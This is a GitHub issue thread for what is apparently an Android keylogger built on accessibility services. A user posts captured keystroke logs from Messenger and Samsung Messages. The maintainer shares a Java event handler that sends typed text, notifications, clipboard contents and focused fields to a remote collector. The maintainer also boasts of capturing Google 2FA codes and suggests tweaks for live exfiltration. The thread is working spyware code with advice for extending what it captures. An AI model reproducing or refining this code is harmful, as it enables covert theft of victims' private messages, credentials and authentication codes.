Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Not Reading Content on Toolbar #7

Closed
AAA12702 opened this issue Mar 20, 2023 · 6 comments
Closed

Not Reading Content on Toolbar #7

AAA12702 opened this issue Mar 20, 2023 · 6 comments

Comments

@AAA12702
Copy link

When user responds to message using either Facebook Messenger or Samsung Messages, app fails to read content and instead prints the following:

Window Changed: [Expand toolbar, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M, @, English (US), .]

( MESSAGES EXAMPLE )

Window Changed: [Messages]
Window Changed: [Messages]
Window Changed: [Expand toolbar, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M, @, English (US), .]
Typed: [A]
Typed: [Ah]
Typed: [Aho]
Typed: [Ahoi]
Typed: [Ahoi]
Typed: [Ahoi]
Typed: [Ahoil]
Typed: [Ahoils]
Typed: [Ahoilsn]
Typed: [Ahoilsnt]
Typed: [Ahoilsnt ]
Typed: [Ahoilsnt]
Typed: [Ahoilsn]
Typed: [Ahoils]
Typed: [Ahoil]
Typed: [Ahoi]
Typed: [Aho]
Typed: [Ah]

Window Changed: []
Window Changed: []

( FACEBOOK MESSENGER EXAMPLE )

Window Changed: [Messenger]
Window Changed: [Messenger]
Focused: [Message]
Window Changed: [Messenger]
Window Changed: [Notification shade.]
Window Changed: []
Window Changed: []
Window Changed: [Expand toolbar, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M, @, English (US), .]
Typed: [O]
Typed: [Oh]
Typed: [Oh ]
Typed: [Oh g]
Typed: [Oh gr]
Typed: [Oh gro]
Typed: [Oh gros]
Typed: [Oh gross]
Window Changed: [Home]
Window Changed: [Home]
Window Changed: [Lock screen]
Window Changed: [Lock screen, 5, :, 05, Mon, March 20]
Window Changed: [Lock screen, 5, :, 05, Mon, March 20]

Gmail version of app compiled in SDK 33.
Tested on both Samsung Galaxy S21+ with Android 13 & Samsung S10e with Android 12. Both fully up to date.
App installed using " adb -g" granting full runtime permissions.
@NullPounce
Copy link
Owner

as long as it works as expected with other apps it may be built in app security.
for example some web browsers do not allow access for accessibility services
in the url web address bar but in the app itself meaning only the url tab is protected, many banks apps are not.

this log message is normal and is just being verbose stating the user has focused on a new user interface ui
element without a name

Window Changed: []

this is the code that handles what is logged, for the most part yes most apps are vulnerable:
I have gotten the Google 2fa code to log with any other notifications and user typed input,
now this will not for example always be able to just log all words on a page.

for example when you open messages on android it wil log

Window Changed: [777
or
Window Changed: [Messaging]

777 being the contact name in some cases

then the app will log typed keys but heres the deal, if the user already has messages inside the app that were
read and received it will not always log what the user sees.

public void onAccessibilityEvent(AccessibilityEvent event) {
        switch (event.getEventType()) {
            case AccessibilityEvent.TYPE_NOTIFICATION_STATE_CHANGED:
                new MessageSender().execute("Notification: " + event.getText().toString());
                Log.i(TAG, "Notification: " + event.getText().toString());
                break;
            case AccessibilityEvent.TYPE_VIEW_CLICKED:
                ClipboardManager clipboard = (ClipboardManager) getSystemService(Context.CLIPBOARD_SERVICE);
                ClipData clip = clipboard.getPrimaryClip();
                if (clip != null) {
                    String text = clip.getItemAt(0).getText().toString();
                    new MessageSender().execute("Clicked: " + text);
                    Log.i(TAG, "Clicked: " + text);
                }
                break;
            case AccessibilityEvent.TYPE_VIEW_FOCUSED:
                new MessageSender().execute("Focused: " + event.getText().toString());
                Log.i(TAG, "Focused: " + event.getText().toString());
                break;
            case AccessibilityEvent.TYPE_VIEW_LONG_CLICKED:
                new MessageSender().execute("Long Clicked: " + event.getText().toString());
                Log.i(TAG, "Long Clicked: " + event.getText().toString());
                break;
            case AccessibilityEvent.TYPE_VIEW_SELECTED:
                new MessageSender().execute("Selected: " + event.getText().toString());
                Log.i(TAG, "Selected: " + event.getText().toString());
                break;
            case AccessibilityEvent.TYPE_VIEW_TEXT_CHANGED:
                new MessageSender().execute("Typed: " + event.getText().toString());
                Log.i(TAG, "Typed: " + event.getText().toString());
                break;
            case AccessibilityEvent.TYPE_WINDOW_STATE_CHANGED:
                new MessageSender().execute("Window Changed: " + event.getText().toString());
                Log.i(TAG, "Window Changed: " + event.getText().toString());
                break;
        }
    }

Window Changed: [Expand toolbar, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, Q, W, E, R, T, Y, U, I, O, P, A, S, D, F, G, H, J, K, L, Z, X, C, V, B, N, M, @,

just looks like a log from using drop down or a keyboard tool or thats just how the log shows each time the keyboard is opened not sure but

Window Changed: [Messenger]
Typed: [O]

looks like its logging whats typed in what app yes?
or are the notifications not logging? could try sending messages to the phone when its not in the app or when the screen is off vs in the app, the ip hardcode version has no buffer and a listener for easy logging and debugging or you could just change the buffer size to 1 or something temporarily to get them live

private static final int MAX_BUFFER_SIZE = 200;
to
private static final int MAX_BUFFER_SIZE = 1;

i know that "English (US), .]" means the keyboard was open.

Let me know if there is anything specific you would like my help with.

@NullPounce
Copy link
Owner

oh so you get the odd string every time you pull down the drop down menu, the swipe down holding notifications?

@AAA12702
Copy link
Author

oh so you get the odd string every time you pull down the drop down menu, the swipe down holding notifications?

Correct

@NullPounce NullPounce pinned this issue Mar 25, 2023
@AAA12702
Copy link
Author

I'm going to mess around with this, but I think using event.getParcelableData() instead of event.getext for anything that doesn't involve keylogging may solve reading the many missing pieces of information in stacked notifications, window changes, and status bar items.

@T-cre
Copy link

T-cre commented Jun 18, 2023

Hello how can I get your services?

@NullPounce
Copy link
Owner

you can contact me @ nullpounce.com and find my socials at the bottom. this issue will be closed as accessibility service keylogging primarily works up to api 28 android 9 pie and some apps have built in protection, i've been trying to work on a gmail keyboard version...

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@NullPounce @AAA12702 @T-cre